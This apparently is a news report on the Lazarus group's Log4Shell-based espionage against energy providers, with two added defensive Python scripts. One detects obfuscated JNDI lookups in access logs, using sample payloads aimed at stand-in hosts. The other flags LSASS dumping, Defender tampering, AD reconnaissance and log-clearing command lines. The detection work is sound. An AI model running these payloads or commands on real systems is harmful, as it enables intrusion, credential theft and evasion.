North Korean Lazarus hackers are targeting energy providers around the world, including power providers in Canada, Japan and the United States.
According to Cisco Talos, the campaign is aimed at gaining long-term access to the targeted organizations; the Lazarus operators then look for valuable data and exfiltrate it back to North Korea.
Some elements of these espionage attacks were already in the public domain, courtesy of earlier reports from Broadcom-owned Symantec and AhnLab in April and May of this year.
Symantec, in its report, attributes the operation to Stonefly, a Lazarus subgroup that is also tracked as Andariel, Guardian of Peace, Operation Troy, and Silent Chollima.
In the attacks disclosed last month, the group deployed two known malware families, VSingle, an HTTP bot, and YamaBot, a Golang backdoor, alongside a previously unseen remote access trojan that Talos calls MagicRAT, which can launch additional payloads on compromised systems. Researchers Jung Soo An, Asheer Malhotra, and Vitor Ventura said: “Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus.”
The threat actors gain initial access to enterprise networks by exploiting Log4Shell, the Log4j vulnerability, in internet-exposed VMware products. Their end goal is persistent access to the victim environment so they can carry out activities in support of North Korean government objectives.
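Initial access of this kind leaves Log4Shell JNDI lookup strings in the web server's access logs, usually in the User-Agent or a query parameter. As an added example (not code from the Talos report or from this article), here is a small Python scanner for those strings. The log lines are constructed for illustration, the addresses are from documentation ranges, and the obfuscation forms it unwinds (`${lower:x}`, `${upper:x}`, `${:-x}` default-value lookups and URL encoding) are the common ones seen in the wild generally, not anything the article attributes to Lazarus.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Sep/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Sep/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [01/Sep/2022:10:00:03 +0000] "GET /portal/?q=${${lower:j}${lower:n}di:rmi://203.0.113.7/b} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.7 - - [01/Sep/2022:10:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Adns%3A%2F%2Fevil.example%2Fc%7D"',
]

# ${lower:j} / ${upper:J} wrap a single character so the literal "jndi" never appears.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}])\}", re.I)
# ${:-j} / ${::-j} / ${env:NOPE:-j} resolve to the default value after ":-".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# What remains after normalisation: a JNDI lookup with one of the protocols Log4j 2.x resolves.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|nis|http)\s*:", re.I)


def _resolve_case(m):
    op, ch = m.group(1).lower(), m.group(2)
    return ch.lower() if op == "lower" else ch.upper()


def normalize(text, max_rounds=5):
    """Undo URL encoding and the simple Log4j lookup tricks, repeating until stable."""
    for _ in range(max_rounds):
        new = unquote(text)
        new = _CASE_LOOKUP.sub(_resolve_case, new)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_access_log(lines):
    """Return one finding per line that carries a JNDI lookup after normalisation."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            findings.append({"lineno": lineno, "scheme": m.group(1).lower(),
                             "normalized": norm, "raw": line})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['lineno']}: jndi/{f['scheme']} lookup -> {f['normalized']}")
```

Scanning the normalized form rather than the raw line is the point: a rule that only looks for the literal `${jndi:` misses the second and third samples. A hit is evidence of an attempt, not of compromise; confirm by checking whether the server subsequently made an outbound LDAP/RMI/DNS connection to the host named in the lookup.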
In one attack chain, the researchers explain, the threat actors used VSingle for reconnaissance, exfiltration, and manual backdooring, which gave the operators more insight into and control over the victim environment. Lazarus has also combined bespoke malware with off-the-shelf tools: credential harvesting with Mimikatz and Procdump, disabling antivirus components, and reconnaissance of Active Directory services. The operators also clean up their traces once the backdoors are active on the endpoint.
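The post-exploitation tradecraft listed above shows up in endpoint process-creation telemetry (Sysmon event 1, or Windows 4688 with command-line auditing enabled). As an added example, not code from the Talos report or from this article, the Python below runs a few coarse command-line rules over constructed events: LSASS dumping with Procdump (plus the rundll32/comsvcs.dll MiniDump variant, which the article does not mention but which is a common equivalent), Microsoft Defender tampering, Active Directory reconnaissance, and event-log clearing. The events, host names, user names and paths are invented for illustration, and the rule set is a hunting starting point rather than a complete detection for this actor.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon event 1 style); hosts, users and paths are invented.
SAMPLE_EVENTS = [
    {"id": 1, "host": "HZN01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "svchost.exe -k netsvcs"},
    {"id": 2, "host": "HZN01", "user": "CORP\\svc_tomcat",
     "cmd": "procdump64.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\ls.dmp"},
    {"id": 3, "host": "HZN01", "user": "CORP\\svc_tomcat",
     "cmd": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\Windows\\Temp\\l.dmp full"},
    {"id": 4, "host": "HZN01", "user": "CORP\\svc_tomcat",
     "cmd": "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 5, "host": "HZN01", "user": "CORP\\svc_tomcat",
     "cmd": "adfind.exe -f (objectcategory=person)"},
    {"id": 6, "host": "WS17", "user": "CORP\\jdoe",
     "cmd": "net.exe group \"Domain Admins\" /domain"},
    {"id": 7, "host": "HZN01", "user": "CORP\\svc_tomcat",
     "cmd": "wevtutil.exe cl Security"},
    {"id": 8, "host": "WS17", "user": "CORP\\jdoe",
     "cmd": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]

# Each rule corresponds to one stage of the tradecraft described in the article.
RULES = {
    "credential_dump_lsass": re.compile(
        r"procdump(?:64)?\.exe.*\blsass\b"            # Procdump against LSASS
        r"|comsvcs\.dll\s*,?\s*MiniDump"              # rundll32 comsvcs.dll MiniDump (added variant)
        r"|sekurlsa::",                               # Mimikatz module syntax
        re.I),
    "av_tampering": re.compile(
        r"Set-MpPreference\s+-Disable\w+"             # Defender settings via PowerShell
        r"|\bsc(?:\.exe)?\s+(?:stop|config)\s+WinDefend\b",
        re.I),
    "ad_reconnaissance": re.compile(
        r"\badfind(?:\.exe)?\b|\bdsquery(?:\.exe)?\b"
        r"|\bnltest(?:\.exe)?\s+/dclist"
        r"|\bnet(?:\.exe)?\s+group\s+\"?domain admins\"?\s+/domain",
        re.I),
    "log_clearing": re.compile(
        r"\bwevtutil(?:\.exe)?\s+cl\b|Clear-EventLog", re.I),
}


def triage(events):
    """Return {rule_name: [event ids]} for every event whose command line matches a rule."""
    hits = defaultdict(list)
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits[name].append(ev["id"])
    return dict(hits)


def stages_per_host(events):
    """Distinct stages seen per host; several stages on one host is the strong signal."""
    seen = defaultdict(set)
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                seen[ev["host"]].add(name)
    return {host: sorted(stages) for host, stages in seen.items()}


if __name__ == "__main__":
    for rule, ids in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: events {ids}")
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} stage(s) -> {stages}")
```

Any single rule will fire on legitimate administration (administrators do take LSASS dumps for crash analysis, and `net group "Domain Admins"` is a routine query), which is why the per-host view matters: a web-application service account running credential dumping, Defender tampering, AD enumeration and log clearing on the same host in sequence is the pattern to escalate.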